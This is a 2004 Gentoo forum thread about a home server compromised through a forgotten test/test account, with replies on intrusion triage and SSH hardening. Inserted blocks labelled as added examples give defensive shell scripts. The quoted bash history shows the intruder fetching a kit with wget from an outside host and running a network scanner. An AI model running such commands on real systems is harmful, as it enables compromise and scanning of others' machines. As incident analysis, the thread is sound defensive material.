Gentoo Forums :: Networking & Security

i got hacked. what were they up to?
bcore (n00b, joined 09 Apr 2003, 59 posts, Toronto)
Posted: Sun Aug 15, 2004 6:44 pm    Post subject: i got hacked. what were they up to?

Ok, so I seem to have been hacked. I run a gentoo box as my home machine, but to be honest, I don't take nearly as good care of it as I should.. I'm sure I got what I deserved. :)

Here's what I found out. The other day, I noticed a failed SSH login on my little syslog scroller to the user named "test". I completely forgot that such a user existed, but thinking about it, I'm pretty sure that when I first installed gentoo on this machine 3 years ago, I made an account with the username AND password of "test", and I guess I forgot to delete it. Now you see why I say I got what I deserved. I decided that I should delete the account, and when I went to delete its home directory, I noticed that a directory named "1" had been created. Inside that directory was a directory called "lib", and in the lib directory was a program I had never seen before. Here's the ls output:

Code:

total 893
-rw-r--r--  1 1013 users 166154 Aug  7 02:10 Born2Kill.seen
-rw-------  1 1013 users  17982 Oct  9  2000 COPYING
-rw-r--r--  1 1013 users 122242 Aug  7 02:12 LinkEvents
-rw-------  1 1013 users   2147 Oct  9  2000 Makefile
-rw-------  1 1013 users   3398 Nov  8  2000 README
-rw-------  1 1013 users   1569 Oct  9  2000 TODO
-rw-------  1 1013 users  25722 Nov  8  2000 VERSIONS
-rwx------  1 1013 users    936 Dec 21  2003 checkmech
-rwx------  1 1013 users  20290 Oct  9  2000 configure
-rwx------  1 1013 users 474228 Sep 29  2001 crond
-rw-r--r--  1 1013 users    111 Aug  7 02:00 emech.users
-rw-r--r--  1 1013 users     76 May 27  2003 knopki.seen
-rw-------  1 1013 users  22935 Oct  9  2000 mech.help
-rw-r--r--  1 1013 users   1085 Aug  7 02:00 mech.levels
-rw-------  1 1013 users      6 Aug  3 19:49 mech.pid
-rw-r--r--  1 1013 users    484 Aug  7 02:00 mech.session
-rw-------  1 1013 users   4842 Jul 28 02:29 mech.set
-rw-r--r--  1 1013 users   4862 Jul 28 02:33 mech.setes
drwx------  2 1013 users    304 Nov  8  2000 randfiles
drwx------  2 1013 users   1184 Sep 29  2001 src


I opened the user's .bash_history, and here's what I found:

Code:

w
ls
dir
cd\
hash
cd /bin/ls
ls
mkdir 1
ls
cd 1
passwd
passwd
passwd
ls
w
uname -a
cd /var
ls
cd mail
ls
test
./tets
./test
wget
cd
ls
rm -rf 1
ls
cd /sbin
ls
mkdir 1
wget
wget born2kill.100free.com/run.tar
cd
mkdir 1
cd 1
wget born2kill.100free.com/run.tar
ls
tar xzvf run.tar
tar xvf run.tar
ls
cd run
ls
./sc 168 32773 25 150
uptime


The creation date of the "1" and "lib" directories is August 3rd, so this happened recently. My question is whether anyone knows what this person was up to? The part I wonder about in particular is the line "./sc <a bunch of numbers>". I went to the URL where they downloaded the program, but it is no longer working. chkrootkit doesn't find anything.

I'm not too worried about having been hacked, as I was planning on replacing my hard drive within a week or two and starting fresh anyways. This time I'll be more careful, obviously. :)

mod edit: Sticky (amne)

edit2: 2006-04-10 unstuck (amne)

_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
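An added example, not part of bcore's post: a small POSIX shell triage of the .bash_history above, pulling out the download URL, the programs run from the dropped directory (including the "./sc 168 32773 25 150" line asked about), the staging directories and the repeated passwd calls. It embeds an abridged copy of the history quoted in the post; the temp file path is the only assumption.

```shell
#!/bin/sh
# Added example (not part of the original post): first-pass triage of a
# recovered .bash_history. It extracts what a responder reads first: remote
# downloads, programs run from the working directory, directories created and
# credential changes. Needs only POSIX sh, grep, awk and sort. The history is
# an abridged copy of the one quoted in the post; the temp path is assumed.
set -eu

HIST="${TMPDIR:-/tmp}/triage_history.$$"
cat > "$HIST" <<'EOF'
w
uname -a
mkdir 1
cd 1
passwd
passwd
passwd
cd /var
cd mail
./tets
./test
wget
cd /sbin
mkdir 1
wget born2kill.100free.com/run.tar
cd
mkdir 1
cd 1
wget born2kill.100free.com/run.tar
tar xvf run.tar
cd run
./sc 168 32773 25 150
uptime
EOF

# Remote fetches: a downloader that was actually given an argument.
history_downloads() {
    awk '$1 ~ /^(wget|curl|ftp|lynx|fetch|tftp)$/ && NF > 1 { print $2 }' "$1" | sort -u
}

# Programs launched from the working directory (./name ...): the dropped kit.
history_executed() {
    grep -E '^\./' "$1" | sort -u
}

# Directories the intruder created (staging areas such as the "1" seen here).
history_mkdirs() {
    awk '$1 == "mkdir" { print $2 }' "$1" | sort -u
}

# How many times account or credential changes were attempted.
history_cred_changes() {
    grep -cE '^(passwd|useradd|usermod|userdel|chsh)( |$)' "$1" || true
}

history_report() {
    printf 'Downloads:\n';            history_downloads "$1"
    printf 'Executed from cwd:\n';    history_executed "$1"
    printf 'Directories created:\n';  history_mkdirs "$1"
    printf 'Credential changes: %s\n' "$(history_cred_changes "$1")"
}

history_report "$HIST"
```

On a live box, run it against the real file (history_report /home/test/.bash_history) before anything overwrites it, and treat the result as a lead rather than a record: history is only written when the shell exits, it is trivially edited, and the "rm -rf 1" followed by a second "mkdir 1" already shows one staging directory being cleaned up.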
jjasghar (Guru, joined 07 Mar 2004, 342 posts, $HOME=/usa/tx/austin)
Posted: Sun Aug 15, 2004 7:09 pm

that is interesting...

moral of that story: don't have a username called "test" :wink: :P
_________________
#include <LinuxUser #324070>
main()
{
printf("and i'm sorry my spellign sucs.");
}
bcore (n00b, joined 09 Apr 2003, 59 posts, Toronto)
Posted: Sun Aug 15, 2004 7:35 pm

Hmm, more web searching seems to reveal that they were attempting (and failing) to install and run an IRC bot. Since I have never gotten into IRC, I have no idea what that is, although I've heard the term many times. :)
sirber (n00b, joined 07 Apr 2004, 37 posts)
Posted: Sun Aug 15, 2004 7:47 pm

You can surely get his IP and contact his ISP about the hacking attempt.
tomchuk (Guru, joined 23 Mar 2003, 317 posts, Brooklyn, NY)
Posted: Sun Aug 15, 2004 8:21 pm

The source IP of the attack is just another compromised box, with either guest/guest, test/test, admin/admin or root/root username/password combos running sshd. I've been getting so many of these attempts that I've stopped reporting these compromised boxes. There has been a huge amount of scans using this new tool since the end of July and there are probably tens of thousands of compromised boxes out there.

The attacker's usual course of events is to log in from a compromised box, change the password, download this little "run.tar" kit, maybe run an IRC bot, and then set the scanning tool to scan an entire class A. Many times he'll also run a trojaned sshd. He'll usually show up later to collect the results and/or use your box to infiltrate others. The scary part is that whoever is behind this hasn't done anything with these compromised boxen yet; they just seem to be cataloging the results of the scans.
brettlpb (Apprentice, joined 27 May 2003, 197 posts)
Posted: Sun Aug 15, 2004 10:10 pm

Sorry to de-rail, but what log are you scrolling to see failed ssh logins etc?
bcore (n00b, joined 09 Apr 2003, 59 posts, Toronto)
Posted: Sun Aug 15, 2004 10:21 pm

/var/log/messages with some serious grep action.
Captain_Loser (Tux's lil' helper, joined 19 Mar 2003, 106 posts)
Posted: Mon Aug 16, 2004 1:12 am

Wow, I just looked through my logs and found a whole lot of failed ssh logins, and what I guess are rootkit attempts.. I am very surprised to see this many cracking attempts aimed at me. I am running a very safe system, but it makes you think.. I am sure glad gentoo has things like emerge -u.
_________________
KHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN!!!!!!!
Determined (n00b, joined 29 Dec 2003, 54 posts)
Posted: Mon Aug 16, 2004 5:18 am

Do you ssh this box from the internet? I hope there is a good reason to have open ports like that.

The moral of the story really: Strong passwords, hardware firewall, encrypt all network traffic possible.
_________________
-Determined

Currently working on;
http://www.familytreelink.com
http://www.davidmonaghan.com
bcore (n00b, joined 09 Apr 2003, 59 posts, Toronto)
Posted: Mon Aug 16, 2004 5:24 am

Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.

I'd say the moral of the story here is don't create a test account, and if you do, don't also make its password "test", and if you do that too, don't forget to delete it. :)
tumbak (Apprentice, joined 10 Jan 2004, 230 posts, supposedly Palestine)
Posted: Mon Aug 16, 2004 7:27 am

I noticed a directory called src/ in your output, can you tar it and share it please, or tar the whole ~test :D
_________________
less QQ more pewpew!
JudgeNik (Tux's lil' helper, joined 02 Mar 2004, 86 posts, Bolzano, Italy)
Posted: Mon Aug 16, 2004 7:30 am

:x damn.

I've seen a folder called /1/ on my server.

I've been told to emerge chkrootkit.
Apparently I've been rooted...

Don't know how; my server was set up at the beginning of last year and it never had any testing accounts on it, and no accounts with same/same.
_________________
See the famous Niko Roberts at http://www.nikoroberts.com
drspewfy (Tux's lil' helper, joined 13 Dec 2003, 125 posts, Mexico)
Posted: Mon Aug 16, 2004 8:35 am

Of course you have been rooted!

And he installed a psyBNC kind of bot. He uses YOUR IP to connect to IRC and talk with others using your IP; if somebody tries to attack him he won't go down because he's spoofing your IP, and you will go down :P

You should use

"lsof" instead of netstat, ps x, etc.

because maybe you have been backdoored.
Use the command "find" to see what files were modified that day;
also try to use tripwire to see what files changed since the intrusion (well, that is for the next penetrations ;) ), besides snort.

good luck!
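An added example, not from drspewfy's post, of the two checks just suggested: a find-based timeline around the intrusion date and a listing of listening sockets with lsof. The directory tree and timestamps are constructed so it runs offline, and all paths are assumptions. It also shows the check a practitioner adds on top: mtime can be forged with touch -r, ctime cannot, so a -cnewer pass catches files that were made to look old.

```shell
#!/bin/sh
# Added example (not from the post): a file timeline around a known intrusion
# date with POSIX find, plus the listening-socket check. The directory tree
# and timestamps are constructed here so it runs offline; on a real box point
# ROOT at / or at a read-only mount of the disk image. Paths are assumptions.
set -eu

ROOT="${TMPDIR:-/tmp}/timeline_demo.$$"
mkdir -p "$ROOT/home/test/1/lib" "$ROOT/sbin"
# Year-old system files, then the drop on Aug 3 2004 and bot activity on Aug 7.
touch -t 200308011200 "$ROOT/sbin/ls" "$ROOT/home/test/.bashrc"
touch -t 200408031949 "$ROOT/home/test/1/lib/mech.pid" "$ROOT/home/test/1/lib/crond"
touch -t 200408070200 "$ROOT/home/test/1/lib/emech.users"

# Files whose mtime falls in (start, end]. Marker files let POSIX -newer do
# the job of the GNU-only -newermt. Timestamps are YYYYMMDDhhmm.
files_modified_between() {   # $1=root $2=start $3=end
    s="${TMPDIR:-/tmp}/ref_start.$$"; e="${TMPDIR:-/tmp}/ref_end.$$"
    touch -t "$2" "$s"; touch -t "$3" "$e"
    find "$1" -type f -newer "$s" ! -newer "$e" | sort
    rm -f "$s" "$e"
}

# Files whose ctime is after $2. touch -r forges mtime (and atime) to look
# old, but ctime is set by the kernel and cannot be written back from userland
# without moving the system clock, so a timestomped file still shows up here.
# -cnewer is a GNU/BSD extension (file ctime vs. the marker's mtime).
files_ctime_changed_after() {   # $1=root $2=YYYYMMDDhhmm
    r="${TMPDIR:-/tmp}/ref_ctime.$$"
    touch -t "$2" "$r"
    find "$1" -type f -cnewer "$r" | sort
    rm -f "$r"
}

# What is listening, with the owning process. lsof reads /proc itself rather
# than trusting the netstat binary, but a replaced lsof or a kernel rootkit
# defeats it just the same: compare against a port scan from another host.
listening_sockets() {
    if command -v lsof >/dev/null 2>&1; then
        lsof -nP -iTCP -sTCP:LISTEN 2>/dev/null || true
    else
        echo "lsof not installed; fall back to: netstat -tlnp" >&2
    fi
}

printf 'Modified 1 to 5 Aug 2004 (the intrusion window):\n'
files_modified_between "$ROOT" 200408010000 200408050000
printf 'ctime after 1 Aug 2004 (catches the old-looking .bashrc):\n'
files_ctime_changed_after "$ROOT" 200408010000
printf 'Listening sockets:\n'
listening_sockets
```

Run the timeline against a mounted image or a read-only mount where possible: find itself updates atime on the directories it walks, and any binary on the compromised disk, find and lsof included, is suspect until compared with a known-good copy.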
bcore (n00b, joined 09 Apr 2003, 59 posts, Toronto)
Posted: Mon Aug 16, 2004 11:44 am

I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...
evoweiss (Veteran, joined 07 Sep 2003, 1678 posts, Edinburgh, UK)
Posted: Mon Aug 16, 2004 11:53 am

Hi all,

Over the past few weeks I've noticed a similar pattern of hack attempts against my box (ssh'ing in and attempting to log in with things like "test", "NOUSER", and "root"). I keep everything up-to-date and, hence, haven't noticed anything amiss. Just a quick tip: There's no need to dig through the log file of everything, just look into the /var/log/sshd/ files to get an indication of that port's activity.

Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others.

Finally, I always use strong passwords and keep my system updated. I suspect I'm pretty safe :).

Best,

Alex
jpc82 (Guru, joined 09 Mar 2003, 326 posts)
Posted: Mon Aug 16, 2004 2:07 pm

Wow I am glad I saw this post.

I was just looking at my logs and I see this
Code:

Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2



Does this mean that all their attempts were not successful? I have good passwords, and I run glsa-check every week to verify my system.

Also there is the line "Failed password for root" I'm confused since I have ssh to not allow root access, or is this just the regular error for failed root access?


Also, would moving ssh to another port stop these attacks? I'm assuming it would since they would be trying to connect to the wrong port?
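An added example, not from jpc82's post, showing how to read lines like these with nothing but grep, sed and awk: failures grouped by source, usernames tried, sources over a threshold, and a search for Accepted lines, which are the only ones that show a login succeeded. It uses the six lines quoted above plus two constructed ones (a second source and a legitimate key login); the temp file path is an assumption. One caveat worth knowing: sshd logs "Failed password for root" even when PermitRootLogin is no, because the root policy is applied after the password check, so that line is noise rather than a sign the setting is being ignored.

```shell
#!/bin/sh
# Added example (not from the post): reading sshd log lines to answer "did any
# of it succeed?". Groups failures by source address, lists the usernames
# tried, flags sources over a threshold and, the part that actually matters,
# pulls out any Accepted line. The first six lines are the ones quoted in the
# post (Gentoo metalog format); the last two are constructed to show a second
# source and a legitimate login. The temp file path is an assumption.
set -eu

LOG="${TMPDIR:-/tmp}/sshd_sample.$$"
cat > "$LOG" <<'EOF'
Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2
Aug 13 21:02:10 [sshd] Failed password for illegal user admin from 198.51.100.7 port 4411 ssh2
Aug 13 22:15:03 [sshd] Accepted publickey for alice from 192.0.2.10 port 50122 ssh2
EOF

# Failed attempts per IPv4 source, busiest first, as "count address".
# "Illegal user" is this sshd's wording; newer releases say "Invalid user".
sshd_failed_by_ip() {
    grep -E 'Illegal user|Invalid user|Failed password for' "$1" \
        | sed -nE 's/.* from ([0-9.]+).*/\1/p' \
        | sort | uniq -c | sort -rn \
        | awk '{ print $1, $2 }'
}

# Sources with at least $2 failures: candidates for a firewall drop rule.
sshd_brute_force_sources() {
    sshd_failed_by_ip "$1" | awk -v n="$2" '$1 >= n { print $2 }'
}

# Every username that was tried, existing or not.
sshd_usernames_tried() {
    sed -nE 's/.*(Illegal user|Invalid user|Failed password for( illegal user| invalid user)?) ([^ ]+) from.*/\3/p' "$1" \
        | sort -u
}

# Successful logins. A Failed line for root is logged even with
# PermitRootLogin no; only an Accepted line means someone got in.
sshd_accepted() {
    grep -E 'Accepted (password|publickey|keyboard-interactive)' "$1" || true
}

sshd_report() {   # $1=log file $2=failure threshold
    printf 'Failed attempts by source:\n'; sshd_failed_by_ip "$1"
    printf 'Usernames tried: %s\n' "$(sshd_usernames_tried "$1" | tr '\n' ' ')"
    printf 'Sources with %s or more failures:\n' "$2"; sshd_brute_force_sources "$1" "$2"
    printf 'Accepted logins (check the source address and time):\n'; sshd_accepted "$1"
}

sshd_report "$LOG" 3
```

An Accepted line from an address or at a time you do not recognise is the finding; a pile of Failed lines from one dial-up address is the background noise the thread describes. Moving sshd to another port removes the noise from scanners that only try 22, not from anyone who port-scans first.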
grant.mcdorman (Apprentice, joined 29 Jan 2003, 295 posts, Toronto, ON, Canada)
Posted: Mon Aug 16, 2004 4:21 pm

bcore wrote:
Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.

I'd say the moral of the story here is don't create a test account, and if you do, don't also make its password "test", and if you do that too, don't forget to delete it. :)
I ssh in from work too, but I've set up the firewall so the ssh port is only open to my work IP - connection attempts from any other IP are dropped. If your work IP is a fixed address, and your firewall supports it (Linux of course does, and some router boxes, e.g. SMC's, do too), you could do this too to get better security. Makes it kinda hard for the 31337 sk1rpt kiddies to try to break in that way.
bcore (n00b, joined 09 Apr 2003, 59 posts, Toronto)
Posted: Mon Aug 16, 2004 4:54 pm

Unfortunately I don't get a static IP from work, but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've also already got it set up to disallow root logins, so I figure I should be reasonably safe...
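An added example covering both grant.mcdorman's firewall suggestion and bcore's plan for key-only, no-root sshd; it is not code from either post. It audits an sshd_config for the relevant keywords, honouring the first-match-wins rule (which is how a PermitRootLogin no appended at the bottom of a file silently fails to apply), and prints the iptables rules that limit port 22 to one source. The two config files are constructed, and the address 203.0.113.5, the user name alice and the temp paths are placeholders.

```shell
#!/bin/sh
# Added example (not from the thread): an audit of sshd_config for the settings
# discussed above (no root login, keys only, no password guessing) and a
# generator for the iptables rules that limit port 22 to one source. The two
# config files are constructed; the allowed address, the user name "alice" and
# the temp paths are assumptions.
set -eu

# Effective value of a keyword, lowercased. sshd takes the FIRST occurrence,
# so a hardened line appended at the bottom changes nothing if a weak one is
# above it. Anything after a Match block is conditional, so stop there.
# Handles the "Keyword value" form only.
sshd_effective() {   # $1=config file $2=keyword
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        /^[[:space:]]*#/ || NF < 2 { next }
        tolower($1) == "match"     { exit }
        tolower($1) == key         { print tolower($2); exit }' "$1"
}

# One finding per line. Missing keywords take the OpenSSH defaults of the time:
# PermitRootLogin yes, PasswordAuthentication yes, PubkeyAuthentication yes.
sshd_audit() {   # $1=config file
    v="$(sshd_effective "$1" PermitRootLogin)"
    [ "${v:-yes}" = "no" ] || echo "PermitRootLogin is ${v:-yes (default)}: set to no (without-password still lets root in with a key)"
    v="$(sshd_effective "$1" PasswordAuthentication)"
    [ "${v:-yes}" = "no" ] || echo "PasswordAuthentication is ${v:-yes (default)}: set to no and log in with keys"
    v="$(sshd_effective "$1" PubkeyAuthentication)"
    [ "${v:-yes}" = "yes" ] || echo "PubkeyAuthentication is $v: keys cannot be used"
    v="$(sshd_effective "$1" AllowUsers)"
    [ -n "$v" ] || echo "AllowUsers not set: every local account, forgotten test users included, may attempt a login"
    return 0
}

# Print (not apply) rules that accept new SSH connections only from $1 and
# drop the rest. Review, then run the output as root. $1 may be an address or CIDR.
ssh_firewall_rules() {   # $1=allowed source $2=ssh port
    cat <<EOF
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport $2 -s $1 -m state --state NEW -j ACCEPT
iptables -A INPUT -p tcp --dport $2 -j DROP
EOF
}

WEAK="${TMPDIR:-/tmp}/sshd_weak.$$"
cat > "$WEAK" <<'EOF'
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
# appended later in the hope of fixing it; sshd ignores it:
PermitRootLogin no
EOF

HARD="${TMPDIR:-/tmp}/sshd_hard.$$"
cat > "$HARD" <<'EOF'
Protocol 2
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
AllowUsers alice
EOF

echo "== weak config ==";      sshd_audit "$WEAK"
echo "== hardened config ==";  sshd_audit "$HARD"
echo "== rules for a fixed work address (203.0.113.5 is a placeholder) =="
ssh_firewall_rules 203.0.113.5 22
```

Without a fixed work address the firewall rule is not an option, and the config side carries the whole load: with PasswordAuthentication no (and ChallengeResponseAuthentication no, so PAM cannot reintroduce passwords) the guessers in this thread have nothing left to guess, and AllowUsers keeps a forgotten account from being a way in even if it still exists.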
smonijhay1 (Apprentice, joined 29 Apr 2004, 229 posts, Ann Arbor Michigan)
Posted: Mon Aug 16, 2004 4:58 pm

geez, what an awesome post!

thought I should give my info a look since I saw this post and sure enough there were numerous attempts at trying to connect using random user names.

now I must learn to set up and configure a good firewall (ipchains? iptables?)
_________________
you mean you are going to remember me by what I type....here?
bcore (n00b, joined 09 Apr 2003, 59 posts, Toronto)
Posted: Mon Aug 16, 2004 5:07 pm

One other thing I have to remark on is that looking at the bash_history really shows how inept this person was. Total script kiddie. I mean, c'mon, "cd\"?! The lame failed attempt to read my mail, then install something in "/sbin"?

I definitely don't think I was up against anyone with skill, so if I had been properly prepared I would have had nothing to worry about.
tomchuk (Guru, joined 23 Mar 2003, 317 posts, Brooklyn, NY)
Posted: Mon Aug 16, 2004 5:32 pm

bcore wrote:
I definitely don't think I was up against anyone with skill.


Well, he definitely wasn't up against anyone with skill :P Come on, three years with a test user with test as a password - you're in no place to critique anyone's typos :)
bcore (n00b, joined 09 Apr 2003, 59 posts, Toronto)
Posted: Mon Aug 16, 2004 5:35 pm

Re-read my posts. I fully admitted that I made a mistake, and I said that if I had done my due diligence, I would have been fine.
tomchuk (Guru, joined 23 Mar 2003, 317 posts, Brooklyn, NY)
Posted: Mon Aug 16, 2004 5:40 pm

I know, it was a joke, notice the 'Razz' and 'Smile' smileys.
GentooBox (Veteran, joined 22 Jun 2003, 1168 posts, Denmark)
Posted: Mon Aug 16, 2004 6:12 pm

I hate ssh worms...

They will never stop.. just like any other worm.
_________________
Encrypt, lock up everything and duct tape the rest
Ox53746F6E65 (n00b, joined 17 Feb 2004, 35 posts)
Posted: Mon Aug 16, 2004 6:13 pm

Use port knocking to make your system more secure.
_________________
Ox is on
Gentoo on VMWare
Sys: Athlon XP 1800+, 1GB Ram, 340 GB HD, Dual Boot Sys with WinXP and GentooR6
Page 1 of 18 (all times are GMT)